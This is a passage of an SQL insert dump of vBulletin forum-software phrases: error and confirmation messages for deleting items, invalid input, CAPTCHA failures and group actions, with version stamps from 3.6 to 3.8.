(34325, -1, 'deleted_calendar_permissions_successfully', 'error', 'Deleted Calendar Permissions Successfully', 'vbulletin', '', 0, ''),
(34326, -1, 'deleted_calendar_successfully', 'error', 'Deleted Calendar Successfully', 'vbulletin', '', 0, ''),
(34327, -1, 'deleted_category_successfully', 'error', 'Deleted Category Successfully', 'vbulletin', '', 0, ''),
(34328, -1, 'deleted_custom_field_successfully', 'error', 'Deleted Custom Field Successfully', 'vbulletin', '', 0, ''),
(34329, -1, 'deleted_duplicate_threads_successfully', 'error', 'Deleted Duplicate Threads Successfully. It is recommended that you Rebuild Forum Information now.', 'vbulletin', '', 0, ''),
(34330, -1, 'deleted_faq_item_successfully', 'error', 'Deleted FAQ Item Successfully', 'vbulletin', '', 0, ''),
(34331, -1, 'deleted_file_successfully', 'error', 'Deleted File Successfully', 'vbulletin', '', 0, ''),
(34332, -1, 'deleted_forum_permissions_successfully', 'error', 'Deleted Forum Permissions Successfully', 'vbulletin', '', 0, ''),
(34333, -1, 'deleted_forum_successfully', 'error', 'Deleted Forum Successfully', 'vbulletin', '', 0, ''),
(34334, -1, 'deleted_holiday_successfully', 'error', 'Deleted Holiday Successfully', 'vbulletin', '', 0, ''),
(34335, -1, 'deleted_infraction_group_successfully', 'error', 'Deleted Infraction Group Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34336, -1, 'deleted_infraction_level_successfully', 'error', 'Deleted Infraction Level Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34337, -1, 'deleted_infraction_successfully', 'error', 'Deleted Infraction Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34338, -1, 'deleted_language_successfully', 'error', 'Deleted Language Successfully', 'vbulletin', '', 0, ''),
(34339, -1, 'deleted_moderator_successfully', 'error', 'Deleted Moderator Successfully', 'vbulletin', '', 0, ''),
(34340, -1, 'deleted_moderators_successfully', 'error', 'Deleted Moderators Successfully', 'vbulletin', '', 0, ''),
(34341, -1, 'deleted_notice_successfully', 'error', 'Deleted Notice Successfully', 'vbulletin', 'vBulletin Solutions', 1189782393, '3.6.8'),
(34342, -1, 'deleted_option_successfully', 'error', 'Deleted Option Successfully', 'vbulletin', '', 0, ''),
(34343, -1, 'deleted_orphan_posts_successfully', 'error', 'Deleted Orphan Posts Successfully.', 'vbulletin', '', 0, ''),
(34344, -1, 'deleted_orphan_threads_successfully', 'error', 'Deleted Orphan Threads Successfully. It is recommended that you Rebuild Forum Information now.', 'vbulletin', '', 0, ''),
(34345, -1, 'deleted_paymentapi_successfully', 'error', 'Deleted Payment API Successfully', 'vbulletin', '', 0, ''),
(34346, -1, 'deleted_phrase_successfully', 'error', 'Deleted Phrase Successfully', 'vbulletin', '', 0, ''),
(34347, -1, 'deleted_plugin_successfully', 'error', 'Deleted Plugin Successfully', 'vbulletin', '', 0, ''),
(34348, -1, 'deleted_poll_successfully', 'error', 'Deleted Poll Successfully', 'vbulletin', '', 0, ''),
(34349, -1, 'deleted_post_icon_successfully', 'error', 'Deleted Post Icon Successfully', 'vbulletin', '', 0, ''),
(34350, -1, 'deleted_private_messages_successfully', 'error', 'Deleted Private Messages Successfully', 'vbulletin', '', 0, ''),
(34351, -1, 'deleted_profile_field_category_successfully', 'error', 'Deleted user profile field category successfully', 'vbulletin', 'vBulletin Solutions', 1176908676, '3.6.6'),
(34352, -1, 'deleted_promotion_successfully', 'error', 'Deleted Promotion Successfully', 'vbulletin', '', 0, ''),
(34353, -1, 'deleted_question_successfully', 'error', 'Deleted Question Successfully', 'vbulletin', 'vBulletin Solutions', 1192564130, '3.7.0 Beta 1'),
(34354, -1, 'deleted_reputation_level_successfully', 'error', 'Deleted Reputation Level Successfully', 'vbulletin', '', 0, ''),
(34355, -1, 'deleted_reputation_successfully', 'error', 'Deleted Reputation Successfully', 'vbulletin', '', 0, ''),
(34356, -1, 'deleted_rssfeed_x_successfully', 'error', 'Deleted RSS Feed \'{1}\' Successfully', 'vbulletin', 'vBulletin Solutions', 1149590407, '3.6.0 Beta 1'),
(34357, -1, 'deleted_scheduled_task_successfully', 'error', 'Deleted Scheduled Task Successfully', 'vbulletin', '', 0, ''),
(34358, -1, 'deleted_setting_group_successfully', 'error', 'Deleted Setting Group Successfully', 'vbulletin', '', 0, ''),
(34359, -1, 'deleted_setting_successfully', 'error', 'Deleted Setting Successfully', 'vbulletin', '', 0, ''),
(34360, -1, 'deleted_smilie_successfully', 'error', 'Deleted Smilie Successfully', 'vbulletin', '', 0, ''),
(34361, -1, 'deleted_subscription_permissions_successfully', 'error', 'Deleted Subscription Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1146676227, '3.6.0 Beta 1'),
(34362, -1, 'deleted_subscription_successfully', 'error', 'Deleted Subscription Successfully', 'vbulletin', '', 0, ''),
(34363, -1, 'deleted_subscriptions_successfully', 'error', 'Deleted Subscriptions Successfully', 'vbulletin', '', 0, ''),
(34364, -1, 'deleted_topic_successfully', 'error', 'Deleted Topic Successfully', 'vbulletin', '', 0, ''),
(34365, -1, 'deleted_user_profile_field_successfully', 'error', 'Deleted User Profile Field Successfully', 'vbulletin', '', 0, ''),
(34366, -1, 'deleted_user_rank_successfully', 'error', 'Deleted User Rank Successfully', 'vbulletin', '', 0, ''),
(34367, -1, 'deleted_user_successfully', 'error', 'Deleted User Successfully', 'vbulletin', '', 0, ''),
(34368, -1, 'deleted_user_title_successfully', 'error', 'Deleted User Title Successfully', 'vbulletin', '', 0, ''),
(34369, -1, 'deleted_usergroup_leader_successfully', 'error', 'Deleted Usergroup Leader Successfully', 'vbulletin', '', 0, ''),
(34370, -1, 'deleted_usergroup_successfully', 'error', 'Deleted Usergroup Successfully', 'vbulletin', '', 0, ''),
(34371, -1, 'deleted_visitor_messages_successfully', 'error', 'Deleted Visitor Messages Successfully', 'vbulletin', 'vBulletin Solutions', 1222174801, '3.8.0 Alpha 2'),
(34372, -1, 'deleted_x_pms_y_pmtexts_and_z_receipts', 'error', 'Deleted {1} private messages, {2} pmtext records and {3} receipts', 'vbulletin', '', 0, ''),
(34373, -1, 'dependencies_not_met_x', 'error', 'The following dependencies were not met:\r\n{1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34374, -1, 'description_toolong_max_x', 'error', 'The description that you have entered is too long ({1} characters). Please shorten it to {2} characters long.', 'vbulletin', 'vBulletin Solutions', 1218210332, '3.8.0 Alpha 1'),
(34375, -1, 'destination_forum_cant_contain_threads', 'error', 'The destination forum cannot contain threads, therefore you cannot move any threads into it', 'vbulletin', '', 0, ''),
(34376, -1, 'did_not_select_any_valid_prefixes_to_copy_to', 'error', 'You did not select any valid prefixes to copy to.', 'vbulletin', 'vBulletin Solutions', 1216744422, '3.8.0 Alpha 1'),
(34377, -1, 'download_contains_no_customizations', 'error', 'The item you are attempting to download contains no customizations.', 'vbulletin', '', 0, ''),
(34378, -1, 'duplicate_post', 'error', 'This post is a duplicate of a post that you have posted in the last five minutes.', 'vbulletin', 'vBulletin Solutions', 1155227415, '3.6.1'),
(34379, -1, 'duplicated_permissions_successfully', 'error', 'Duplicated Permissions Successfully', 'vbulletin', '', 0, ''),
(34380, -1, 'duplicated_prefix_permissions', 'error', 'Duplicated Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1216744446, '3.8.0 Alpha 1'),
(34381, -1, 'edittimelimit', 'error', 'The administrator has specified that you can only edit messages for {1} minutes after you have posted. This limit has expired, so you must contact the administrator to make alterations on your message.', 'vbulletin', '', 0, ''),
(34382, -1, 'emailchanged', 'error', 'Thank you, your email address has been updated to {1}.', 'vbulletin', 'vBulletin Solutions', 1154126580, '3.6.0'),
(34383, -1, 'emaildisabled', 'error', 'Sorry. The email function has been disabled by the administrator.', 'vbulletin', '', 0, ''),
(34384, -1, 'emailfloodcheck', 'error', 'This forum requires that you wait {1} seconds between sending emails. Please try again in {2} seconds.', 'vbulletin', '', 0, ''),
(34385, -1, 'emailmismatch', 'error', 'The two email addresses that you entered do not match.', 'vbulletin', '', 0, ''),
(34386, -1, 'emails_sent_successfully', 'error', 'Emails Sent Successfully', 'vbulletin', '', 0, ''),
(34387, -1, 'emailtaken', 'error', 'The email address you entered is already in use. If you have forgotten your password, please click here .', 'vbulletin', '', 0, ''),
(34388, -1, 'emailtaken_edit_here', 'error', 'The email address you entered is already in use. You can edit that user here .', 'vbulletin', 'vBulletin Solutions', 1200913170, '3.7.0 Beta 4'),
(34389, -1, 'emailtaken_search_here', 'error', 'The email address you entered is already in use. You may search for any users using this email address here .', 'vbulletin', 'vBulletin Solutions', 1200913551, '3.7.0 Beta 4'),
(34390, -1, 'emptied_search_index_successfully', 'error', 'Emptied Search Index Successfully', 'vbulletin', '', 0, ''),
(34391, -1, 'enabled_disabled_scheduled_task_successfully', 'error', 'Enabled / Disabled Scheduled Task Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34392, -1, 'enter_cost_information_for_subscription_x', 'error', 'Enter the cost information for subscription: {1}', 'vbulletin', 'vBulletin Solutions', 1164210348, '3.6.4'),
(34393, -1, 'enter_subscription_length_for_subscription_x', 'error', 'Enter the subscription length for subscription: {1}', 'vbulletin', 'vBulletin Solutions', 1164210359, '3.6.4'),
(34394, -1, 'error_in_template_x_y', 'error', 'The following error occurred when attempting to evaluate the template \'{1}\': {2} This is likely caused by a malformed conditional statement.', 'vbulletin', '', 0, ''),
(34395, -1, 'error_writing_x', 'error', 'Error Writing {1}. You Can See More Information Above', 'vbulletin', '', 0, ''),
(34396, -1, 'event_already_complete', 'error', 'This event has already been marked as complete by {1}, {2} at {3}', 'vbulletin', '', 0, ''),
(34397, -1, 'eventsnoselected', 'error', 'You did not specify any event reminders to modify.', 'vbulletin', '', 0, ''),
(34398, -1, 'expression_contains_backticks_x_please_rewrite_without', 'error', 'The following template conditional expression contains back-ticks (`): \r\n \r\n{1}
\r\n \r\nThe use of back-ticks is forbidden. Please go back and re-write the conditional expression without using them.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(34399, -1, 'fieldmissing', 'error', 'You have left a required field blank.', 'vbulletin', '', 0, ''),
(34400, -1, 'fieldmissing_email', 'error', 'Please complete the required field \"Email\".', 'vbulletin', '', 0, ''),
(34401, -1, 'fieldmissing_parentemail', 'error', 'Please complete the required field \"Parent Email\".', 'vbulletin', '', 0, ''),
(34402, -1, 'fieldmissing_username', 'error', 'Please complete the required field \"Username\".', 'vbulletin', '', 0, ''),
(34403, -1, 'file_x_already_exists', 'error', 'The file {1} already exists.', 'vbulletin', '', 0, ''),
(34404, -1, 'forum_cant_have_password', 'error', 'The administrator has specified that this forum may not be password-protected', 'vbulletin', '', 0, ''),
(34405, -1, 'forum_is_a_category_allow_posting', 'error', 'You have selected a forum that is a category. Please select a forum that allows posting.', 'vbulletin', 'vBulletin Solutions', 1152530479, '3.6.0 Release Candidate 1'),
(34406, -1, 'forumclosed', 'error', 'Sorry! This forum is not accepting new posts.', 'vbulletin', '', 0, ''),
(34407, -1, 'forumpasswordincorrect', 'error', 'The password you entered was incorrect. Please try again. \r\nNote : This requires cookies to be enabled!
\r\n\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34408, -1, 'forumpasswordmissing', 'error', 'Your administrator has required a password to access this forum. Please enter this password now. \r\nNote: This requires cookies!
\r\n\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34409, -1, 'forumpasswordmissing_ajax', 'error', 'Your administrator has required a password to access this forum. Please refresh this page and enter the password when asked.', 'vbulletin', 'vBulletin Solutions', 1204133092, '3.7.0 Beta 6'),
(34410, -1, 'friendswithself', 'error', 'You can\'t be friends with yourself.', 'vbulletin', 'vBulletin Solutions', 1195235503, '3.7.0 Beta 1'),
(34411, -1, 'generic_error_x', 'error', '{1}', 'vbulletin', '', 0, ''),
(34412, -1, 'group_already_exists_view_x', 'error', 'A group with that name already exists. You can view it here .', 'vbulletin', 'vBulletin Solutions', 1195660385, '3.7.0 Beta 1'),
(34413, -1, 'group_ownership_request_rejected', 'error', 'Group ownership change request rejected', 'vbulletin', 'vBulletin Solutions', 1232709826, '3.8.1'),
(34414, -1, 'guest_posts_may_not_contain_attachments', 'error', 'Guest posts may not contain attachments. Please select a registered user name to own this merged post.', 'vbulletin', '', 0, ''),
(34415, -1, 'humanverify_image_wronganswer', 'error', 'The string you entered for the image verification did not match what was displayed.', 'vbulletin', 'vBulletin Solutions', 1192648116, '3.7.0 Beta 1'),
(34416, -1, 'humanverify_question_wronganswer', 'error', 'The answer given for the random question was incorrect.', 'vbulletin', 'vBulletin Solutions', 1192574503, '3.7.0 Beta 1'),
(34417, -1, 'humanverify_recaptcha_challenge', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ challenge setting. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205929932, '3.7.0 Release Candidate 1'),
(34418, -1, 'humanverify_recaptcha_parameters', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ parameters. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930038, '3.7.0 Release Candidate 1'),
(34419, -1, 'humanverify_recaptcha_privatekey', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ private key. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930045, '3.7.0 Release Candidate 1'),
(34420, -1, 'humanverify_recaptcha_publickey', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ public key. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930053, '3.7.0 Release Candidate 1'),
(34421, -1, 'humanverify_recaptcha_referrer', 'error', 'Image verification unsuccessful due to incorrect reCAPTCHA™ domain setting. Contact the admin.', 'vbulletin', 'vBulletin Solutions', 1205930058, '3.7.0 Release Candidate 1'),
(34422, -1, 'humanverify_recaptcha_unreachable', 'error', 'Image verification could not be verified due to server issues. Please try again later.', 'vbulletin', 'vBulletin Solutions', 1192648471, '3.7.0 Beta 1'),
(34423, -1, 'image_resize_failed_x', 'error', 'Image resize failed: {1} ', 'vbulletin', 'vBulletin Solutions', 1145307709, '3.6.0 Beta 1'),
(34424, -1, 'images_moved_to_the_database', 'error', 'Images Successfully Moved to the Database', 'vbulletin', '', 0, ''),
(34425, -1, 'images_moved_to_the_filesystem', 'error', 'Images Successfully Moved to the Filesystem', 'vbulletin', '', 0, ''),
(34426, -1, 'immethodnotdefined', 'error', '{1} has not specified contact details for this medium.', 'vbulletin', '', 0, ''),
(34427, -1, 'infraction_already_reversed', 'error', 'This infraction has already been reversed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34428, -1, 'infractionupdated', 'error', 'This infraction has been updated since you viewed. Please go back and refresh the infraction to see the changes.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34429, -1, 'install_ghostscript_to_resize_pdf', 'error', 'Ghostscript must be installed on the server to resize .pdf files.', 'vbulletin', 'vBulletin Solutions', 1212055446, '3.7.2'),
(34430, -1, 'invalid_action', 'error', 'Invalid Action Specified', 'vbulletin', '', 0, ''),
(34431, -1, 'invalid_action_specified', 'error', 'Invalid Action Specified', 'vbulletin', '', 0, ''),
(34432, -1, 'invalid_array_specified', 'error', 'Invalid Array Specified', 'vbulletin', '', 0, ''),
(34433, -1, 'invalid_attachments_specified', 'error', 'Invalid Attachments Specified', 'vbulletin', '', 0, ''),
(34434, -1, 'invalid_avatar_specified', 'error', 'Invalid Avatar Specified', 'vbulletin', '', 0, ''),
(34435, -1, 'invalid_ban_period_specified', 'error', 'Invalid Ban Period Specified', 'vbulletin', '', 0, ''),
(34436, -1, 'invalid_banreason', 'error', 'Since this infraction will result in the user being banned you must give a ban reason, which the user will see on the no permission screen.', 'vbulletin', 'vBulletin Solutions', 1157584172, '3.6.1'),
(34437, -1, 'invalid_calendar_specified', 'error', 'Invalid Calendar Specified', 'vbulletin', '', 0, ''),
(34438, -1, 'invalid_currency', 'error', 'An invalid currency was selected.', 'vbulletin', '', 0, ''),
(34439, -1, 'invalid_custom_field_specified', 'error', 'Invalid Custom Field Specified', 'vbulletin', '', 0, ''),
(34440, -1, 'invalid_custom_infraction_description', 'error', 'Enter a description for this custom infraction', 'vbulletin', 'vBulletin Solutions', 1149886072, '3.6.0 Beta 2'),
(34441, -1, 'invalid_date_range_specified', 'error', 'Invalid Date Range Specified', 'vbulletin', '', 0, ''),
(34442, -1, 'invalid_destination_forum_specified', 'error', 'Invalid Destination Forum Specified', 'vbulletin', '', 0, ''),
(34443, -1, 'invalid_destination_username_specified', 'error', 'Invalid Destination Username Specified', 'vbulletin', '', 0, ''),
(34444, -1, 'invalid_directory_specified', 'error', 'Invalid Directory Specified', 'vbulletin', '', 0, ''),
(34445, -1, 'invalid_email_specified', 'error', 'Invalid Email Specified', 'vbulletin', '', 0, ''),
(34446, -1, 'invalid_extension_specified', 'error', 'Invalid Extension Specified', 'vbulletin', 'vBulletin Solutions', 1148488646, '3.6.0 Beta 1'),
(34447, -1, 'invalid_faq_item_specified', 'error', 'Invalid FAQ Item Specified', 'vbulletin', '', 0, ''),
(34448, -1, 'invalid_faq_varname', 'error', 'The varname you specified for this FAQ is invalid. You may only include a-z, A-Z, 0-9, and _ (underscore).', 'vbulletin', '', 0, ''),
(34449, -1, 'invalid_file_path_specified', 'error', 'Invalid File Path Specified', 'vbulletin', '', 0, ''),
(34450, -1, 'invalid_file_specified', 'error', 'Invalid File Specified', 'vbulletin', '', 0, ''),
(34451, -1, 'invalid_filename_specified', 'error', 'Invalid Filename Specified', 'vbulletin', '', 0, ''),
(34452, -1, 'invalid_forum_permissions_specified', 'error', 'Invalid Forum Permissions Specified', 'vbulletin', '', 0, ''),
(34453, -1, 'invalid_forum_specified', 'error', 'Invalid Forum Specified', 'vbulletin', '', 0, ''),
(34454, -1, 'invalid_imageprefix_specified', 'error', 'The image prefix specified is not valid.', 'vbulletin', 'vBulletin Solutions', 1194284266, '3.7.0 Beta 1'),
(34455, -1, 'invalid_infraction_usergroup', 'error', 'You cannot have the same pointlevel defined more than once for the same usergroup. \"All Usergroups\" entries must have a unique point level from all other entries.', 'vbulletin', 'vBulletin Solutions', 1150741401, '3.6.0 Beta 3'),
(34456, -1, 'invalid_language_specified', 'error', 'Invalid Language Specified', 'vbulletin', '', 0, ''),
(34457, -1, 'invalid_locale', 'error', 'The locale \'{1}\' could not be located on this server.', 'vbulletin', '', 0, ''),
(34458, -1, 'invalid_moderator_specified', 'error', 'Invalid Moderator Specified', 'vbulletin', '', 0, ''),
(34459, -1, 'invalid_option_specified', 'error', 'Invalid Option Specified', 'vbulletin', '', 0, ''),
(34460, -1, 'invalid_page_specified', 'error', 'Invalid Page Specified', 'vbulletin', '', 0, ''),
(34461, -1, 'invalid_password_specified', 'error', 'Invalid Password Specified', 'vbulletin', '', 0, ''),
(34462, -1, 'invalid_phrase_specified', 'error', 'Invalid Phrase Specified', 'vbulletin', '', 0, ''),
(34463, -1, 'invalid_phrase_varname', 'error', 'The varname you specified for this phrase is invalid. You may only include a-z, A-Z, 0-9, and _ (underscore).', 'vbulletin', '', 0, ''),
(34464, -1, 'invalid_podcasturl', 'error', 'Podcast - Could not determine filesize. Verify that the URL is correct and if it is, enter the filesize manually.', 'vbulletin', 'vBulletin Solutions', 1152645073, '3.6.0 Release Candidate 2'),
(34465, -1, 'invalid_poll_specified', 'error', 'Invalid Poll Specified', 'vbulletin', '', 0, ''),
(34466, -1, 'invalid_product_specified', 'error', 'Invalid Product Specified', 'vbulletin', '', 0, ''),
(34467, -1, 'invalid_product_version', 'error', 'Invalid product version specified. Product versions should be specified in the standard vBulletin version format or a similar format.', 'vbulletin', 'vBulletin Solutions', 1209726715, '3.7.1'),
(34468, -1, 'invalid_quick_set_action', 'error', 'Invalid quick set action specified', 'vbulletin', '', 0, ''),
(34469, -1, 'invalid_referrer_specified', 'error', 'Invalid Referrer Specified', 'vbulletin', '', 0, ''),
(34470, -1, 'invalid_search_syntax', 'error', 'Search terms contain invalid syntax: -word1 OR word2 / word1 OR -word2 ', 'vbulletin', 'vBulletin Solutions', 1155596135, '3.6.1'),
(34471, -1, 'invalid_selector_name_x', 'error', 'Invalid selector name {1}.', 'vbulletin', 'vBulletin Solutions', 1193401478, '3.7.0 Beta 1'),
(34472, -1, 'invalid_social_group_category_specified', 'error', 'Invalid Social Group Category Specified', 'vbulletin', 'vBulletin Solutions', 1215703983, '3.8.0 Alpha 1'),
(34473, -1, 'invalid_source_username_specified', 'error', 'Invalid Source Username Specified', 'vbulletin', '', 0, ''),
(34474, -1, 'invalid_string_id_alphanumeric', 'error', 'Invalid string specified. You may only use a-z, 0-9 and _ (underscore).', 'vbulletin', 'vBulletin Solutions', 1210067261, '3.7.1'),
(34475, -1, 'invalid_style_specified', 'error', 'Invalid Style Specified', 'vbulletin', '', 0, ''),
(34476, -1, 'invalid_subscription_length', 'error', 'The length of the subscription you entered is invalid. The length must be a positive value which will result in a date less than 2037.', 'vbulletin', '', 0, ''),
(34477, -1, 'invalid_table_specified', 'error', 'Invalid Table Specified', 'vbulletin', '', 0, ''),
(34478, -1, 'invalid_tag_specified', 'error', 'Invalid Tag Specified', 'vbulletin', 'vBulletin Solutions', 1190808692, '3.7.0 Beta 1'),
(34479, -1, 'invalid_timeframe', 'error', 'Invalid timeframe entered for custom infraction expiration. How many hours, days, or months?', 'vbulletin', 'vBulletin Solutions', 1149874790, '3.6.0 Beta 2'),
(34480, -1, 'invalid_timezone_specified', 'error', 'Invalid Timezone Specified', 'vbulletin', '', 0, ''),
(34481, -1, 'invalid_title_specified', 'error', 'Invalid Title Specified', 'vbulletin', '', 0, ''),
(34482, -1, 'invalid_transfer_request', 'error', 'You cannot accept ownership of the specified social group. If you have followed a valid link, you or the existing group owner may have cancelled the request to transfer the group ownership.', 'vbulletin', 'vBulletin Solutions', 1221645706, '3.8.0 Alpha 1'),
(34483, -1, 'invalid_user_specified', 'error', 'Invalid User Specified', 'vbulletin', '', 0, ''),
(34484, -1, 'invalid_user_title_specified', 'error', 'Invalid User Title Specified', 'vbulletin', '', 0, ''),
(34485, -1, 'invalid_usergroup_leader_specified', 'error', 'Invalid Usergroup Leader Specified', 'vbulletin', '', 0, ''),
(34486, -1, 'invalid_usergroup_specified', 'error', 'Invalid Usergroup Specified', 'vbulletin', '', 0, ''),
(34487, -1, 'invalid_username_specified', 'error', 'Invalid User Name Specified', 'vbulletin', '', 0, ''),
(34488, -1, 'invalid_users_specified', 'error', 'Invalid Users Specified', 'vbulletin', '', 0, ''),
(34489, -1, 'invalid_values_customize_profile', 'error', 'You entered one or more invalid values when trying to customize this user\'s profile.', 'vbulletin', 'vBulletin Solutions', 1199377639, '3.7.0 Beta 4'),
(34490, -1, 'invalid_version_check_url_specified', 'error', 'Invalid version check URL specified', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34491, -1, 'invalid_x_specified', 'error', 'Invalid {1} Specified', 'vbulletin', '', 0, ''),
(34492, -1, 'invalidactivateid', 'error', 'We could not activate your account because this web address is not valid. Make sure that you have the entire address from the email, and that your email client has not split the address over several lines. \r\n Please try again with the full address from the email that you received. If it still does not work, try filling in the activation form: \r\nActivation form \r\n\r\nIf you do not know your activation code, you can find it in the email that was sent to you when you first registered. To have it sent again, please click here: \r\nSend new email with activation code.
\r\n\r\nIf all else fails, email the administrator , making sure that you include your registered email address and username.', 'vbulletin', '', 0, ''),
(34493, -1, 'invalidemail', 'error', 'You have not entered an email address that we recognize. Please try again or contact the administrator .', 'vbulletin', '', 0, ''),
(34494, -1, 'invalidid', 'error', 'Invalid {1} specified. If you followed a valid link, please notify the administrator ', 'vbulletin', '', 0, ''),
(34495, -1, 'invalidid_ajax', 'error', 'Invalid {1} specified. If you followed a valid link, please notify the administrator.', 'vbulletin', 'vBulletin Solutions', 1198883161, '3.7.0 Beta 4'),
(34496, -1, 'invalidvote', 'error', 'You submitted an invalid vote.', 'vbulletin', '', 0, ''),
(34497, -1, 'language_already_exists', 'error', 'A language called \'{1} \' already exists. - To use this language file, either overwrite the language called \'{1} \', or enter a different title on the upload form.', 'vbulletin', '', 0, ''),
(34498, -1, 'language_only_phrases', 'error', 'The file you attempted to import only contains phrases and none of the settings required.\r\n\r\nYou will be unable to make a new language with this file.', 'vbulletin', '', 0, ''),
(34499, -1, 'lifted_ban_on_user_x_successfully', 'error', 'Lifted Ban on User {1} Successfully', 'vbulletin', '', 0, ''),
(34500, -1, 'listbaduser', 'error', 'The user \'{1}\' was not found in the database. Please go back and correct this problem. You may want to check out the member list .', 'vbulletin', '', 0, ''),
(34501, -1, 'listignoreuser', 'error', 'Sorry {1} is a moderator/admin and you are not allowed to ignore him or her.', 'vbulletin', '', 0, ''),
(34502, -1, 'listlimit', 'error', 'You may only have a maximum of 1000 users on this list.', 'vbulletin', 'vBulletin Solutions', 1162930914, '3.6.3'),
(34503, -1, 'locale_define_fill_in_all_overrides', 'error', 'You have defined a locale for this language but did not define all of the date/time override fields. You must define each of these fields using the formatting style that is listed. Note that this style differs from the formatting you would use in the vboptions for the normal date/time fields.', 'vbulletin', '', 0, ''),
(34504, -1, 'logout_error', 'error', 'An error occurred while attempting to log you out. Click here to log out. ', 'vbulletin', '', 0, ''),
(34505, -1, 'maxpolltimeout', 'error', 'The value entered for timeout has exceeded the maximum possible value.', 'vbulletin', '', 0, ''),
(34506, -1, 'mergebadurl', 'error', 'You have not specified a valid URL for the thread that you want to merge. Please check that the URL includes a valid threadid, \"t=xxx\" or postid, \"p=xxx\" (where xxx is a number), and is not a redirect.', 'vbulletin', 'vBulletin Solutions', 1165970610, '3.6.5'),
(34507, -1, 'merged_thread_can_contain_one_poll', 'error', 'Merged threads can contain a maximum of one poll.', 'vbulletin', '', 0, ''),
(34508, -1, 'missing_temporary_folder', 'error', 'Missing PHP temporary folder; check upload_tmp_dir', 'vbulletin', 'vBulletin Solutions', 1190139531, '3.7.0 Beta 1'),
(34509, -1, 'moderated_attachments_successfully', 'error', 'Moderated Attachments Successfully', 'vbulletin', '', 0, ''),
(34510, -1, 'moderated_events_successfully', 'error', 'Moderated Events Successfully', 'vbulletin', '', 0, ''),
(34511, -1, 'moderated_posts_successfully', 'error', 'Moderated Threads / Posts Successfully', 'vbulletin', '', 0, ''),
(34512, -1, 'moderated_signatures_successfully', 'error', 'Moderated Signatures Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34513, -1, 'moderated_visitor_messages_successfully', 'error', 'Moderated Visitor Messages Successfully', 'vbulletin', 'vBulletin Solutions', 1197370927, '3.7.0 Beta 1'),
(34514, -1, 'moderateuser', 'error', 'Thank you for registering, {1}. Your account has been submitted for moderation by an administrator and will be activated shortly. You will be notified by email when this happens. To return to the forums, click here .', 'vbulletin', '', 0, ''),
(34515, -1, 'move_posts_moderated_forums_only', 'error', 'You may only move posts into threads within forums you moderate.', 'vbulletin', 'vBulletin Solutions', 1183555725, '3.6.8'),
(34516, -1, 'moved_threads_successfully', 'error', 'Moved Threads Successfully. It is recommended that you update counters now.', 'vbulletin', '', 0, ''),
(34517, -1, 'moved_threads_successfully_modcp', 'error', 'Moved Threads Successfully', 'vbulletin', '', 0, ''),
(34518, -1, 'moved_users_successfully', 'error', 'Moved Users Successfully', 'vbulletin', '', 0, ''),
(34519, -1, 'moveillegalforum', 'error', 'You have tried to move the thread into a forum that cannot contain posts. Please select a different forum.', 'vbulletin', '', 0, ''),
(34520, -1, 'movesameforum', 'error', 'You cannot move a thread to the same forum it is currently in. Someone else may have just moved this thread to your destination forum resulting in this error message.', 'vbulletin', '', 0, ''),
(34521, -1, 'multiple_pictures_uploaded_errors_file_x', 'error', 'Some of the pictures you attempted to upload failed. The pictures that failed are:\r\n
\r\nTo receive a more detailed error message, upload only one picture at a time.', 'vbulletin', 'vBulletin Solutions', 1192120858, '3.7.0 Beta 1'),
(34522, -1, 'must_be_group_member', 'error', 'You must be a group member to perform this action.', 'vbulletin', 'vBulletin Solutions', 1195320186, '3.7.0 Beta 1'),
(34523, -1, 'must_be_group_member_view_add_pictures', 'error', 'You must be a member of this group to view or add pictures. ', 'vbulletin', 'vBulletin Solutions', 1195562442, '3.7.0 Beta 1'),
(34524, -1, 'must_be_group_member_view_add_pictures_join_x', 'error', 'You must be a member of this group to view or add pictures. Would you like to join? Click here! ', 'vbulletin', 'vBulletin Solutions', 1195562418, '3.7.0 Beta 1'),
(34525, -1, 'must_be_two_different_users', 'error', 'There must be two different users specified.', 'vbulletin', 'vBulletin Solutions', 1201045799, '3.7.0 Beta 5'),
(34526, -1, 'must_enter_group_name', 'error', 'You must enter a group name.', 'vbulletin', 'vBulletin Solutions', 1198068307, '3.7.0 Beta 3'),
(34527, -1, 'must_have_positive_maxlength', 'error', 'You must enter a positive value (greater than 0) for the \"Maximum Length\" setting.', 'vbulletin', 'vBulletin Solutions', 1205767973, '3.7.0 Release Candidate 1'),
(34528, -1, 'must_save_calendar', 'error', 'You must save this calendar before you can add custom fields to it', 'vbulletin', '', 0, ''),
(34529, -1, 'must_select_a_category', 'error', 'You must select a category for your social group.', 'vbulletin', 'vBulletin Solutions', 1215700349, '3.8.0 Alpha 1'),
(34530, -1, 'must_select_valid_group_add_pictures', 'error', 'You must select a valid group into which these pictures should be added.', 'vbulletin', 'vBulletin Solutions', 1195493057, '3.7.0 Beta 1'),
(34531, -1, 'must_select_valid_pictures_add_group', 'error', 'You must select valid pictures to add to the group.', 'vbulletin', 'vBulletin Solutions', 1196425984, '3.7.0 Beta 1'),
